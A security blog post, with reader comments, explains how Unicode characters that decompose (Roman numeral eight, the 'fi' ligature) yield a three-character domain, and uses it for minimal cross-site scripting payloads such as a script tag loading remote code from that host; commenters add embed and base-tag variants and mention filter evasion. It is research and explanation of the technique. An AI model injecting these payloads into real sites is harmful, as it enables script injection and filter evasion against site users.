Buying a single character domain - and 3 character FQDN - for £15


Short domains are useful for security testing. If you only have a limited number of characters, you need to be able to reference code on a remote server in as few characters as possible.

A few years ago, I tried to find a Minimum Viable XSS. The conclusion that I (and others) came to is that 20 characters is the bare minimum. But it requires you have a 2 character domain name on a 2-character TLD. Something like xy.uk

I don't think any 1- or 2-character domain names are available. If they're for sale, it will be at extortionate price. There are no Top-Level Domains shorter than 2 characters.

So, let's cheat!

This is the story of how I bought a single character domain, and am able to reference it in 3 characters, for the cost of a round of drinks.

Brief History

As I discussed in Domain hacks with unusual Unicode characters - there are a bunch of single Unicode codepoints which are normalised to 2- or 3-character sequences.

For example, is the scientific symbol for Hertz. It is a single codepoint (U+3390). When your browser sees it in a domain name, it automatically splits it into the H and z characters. This is called decomposition.

Based on my count, there are about 90 symbols which decompose into 2 characters - for example , , dz. There are about 35 symbols which decompose into 3 characters - for example , , .

But, as mentioned, it is almost impossible to find a cheap 2- or 3-letter domain name.

There are, however, a couple of four character decompositions!

Quidquid latine dictum sit, altum videtur

The Romans didn't use a positional number system. The number 1 was Ⅰ, the number 2 was Ⅱ, the number 9 was Ⅸ.

But - look closely! The is not the English letter I - it is its own, separate, Unicode character (U+2160). And is not two s smushed together, it is (U+2161).

When decomposed, however, they return to English letters.

What's the longest Roman numeral captured in a single codepoint?

The number 8 is (U+2167) - which decomposes to V I I I. Four characters!

but apart from the sanitation, the medicine, education, wine, public order, irrigation, roads, a fresh water system, public health, and a number system suitable for character decomposition what have the Romans ever done for us?

tl;dr TLD

There are a number of Top-Level Domains which can also be represented by a single character.

For example, Australia's TLD .au can be represented by the Astronomical Unit sign (U+3373).

Most of those domains were expensive, or unavailable. But I found one which was both cheap and available.

Yes! The orthographic ligature of decomposes to f and i. That's the TLD for Finland.

I was able to register a Finnish domain on Gandi for £15.

Ⅷ.fi

That's Roman Numeral Eight (U+2167), dot (U+002E), Latin Small Ligature Fi (U+FB01).

Is this useful?

This gives me a Minimum Viable XSS in eighteen characters!

  • <script src=//Ⅷ.fi>

I'm pretty sure that's the shortest possible sequence!

Or, for loading remote resources in 15 characters:

  • <img src=//Ⅷ.fi>

There aren't many sites which are secured only by using a restricted character count - thankfully! But shrunk domains can also be useful for evading all sorts of filters.

Other domains are available

There's one other 4-character decomposition available - see if you can find it!
There are a few shrinkable TLDs which still have some of the 2- and 3-character domains available, but they are extortionately priced.

If you do grab one of these, and make something cool with it, please let me know.

Support this blog

If you've learned something from my blog posts, here's how you can return the favour:


Share this post on…

  • Mastodon
  • Facebook
  • LinkedIn
  • BlueSky
  • Threads
  • Reddit
  • HackerNews
  • Lobsters
  • WhatsApp
  • Telegram

19 thoughts on “Buying a single character domain - and 3 character FQDN - for £15”

  1. said on twitter.com:

    Very cool and nice post!

    Couple of years ago you could do the same trick (on most browsers) in just TWO characters. This trick was using Unicode letters like ’⒉ ’ or ’⒖ ’ or ’🄀 ’, and for the TLD letters like ’fi’ or ’℡’ or ’™’.

    Reply | Reply to original comment on twitter.com
  2. GC says:

    Does if really work? Won't the domain and tld be translated into punycode IDN? You'd get "xn--x4g.xn--jm6c"... On top of xn--jm6c not being a valid TLD, it isn't that short anymore...

    Reply
    1. says:

      It does work. Copy and past these characters into your browser to test Ⅷ.fi

      There is no Punycode. Your browser performs the IDNA2008 process listed in RFC5895 to normalise it first.

      Reply
  3. RonaldL says:

    Awesome write-up. I ran into the same problem today, and used your solution. I even managed to get it down to 17 even by using the following:

    //Ⅷ.fi

    And return an svg file containing the xss. I cheated and altered the answer, because I don't own the domain. But it works.

    Reply
    1. RonaldL says:

      Well that didn't work. It should read: < embed src=//Ⅷ.fi >

      Without the spaces.

      Reply
  4. says:

    Also 17 chars: < base href=//Ⅷ.fi > I have an idea to get it down to 16 with some more IDN Homograpg tricks.

    Reply

What links here from around this blog?

What are your reckons?

All comments are moderated and may not be published immediately. Your email address will not be published.

Allowed HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <p> <pre> <br> <img src="" alt="" title="" srcset="">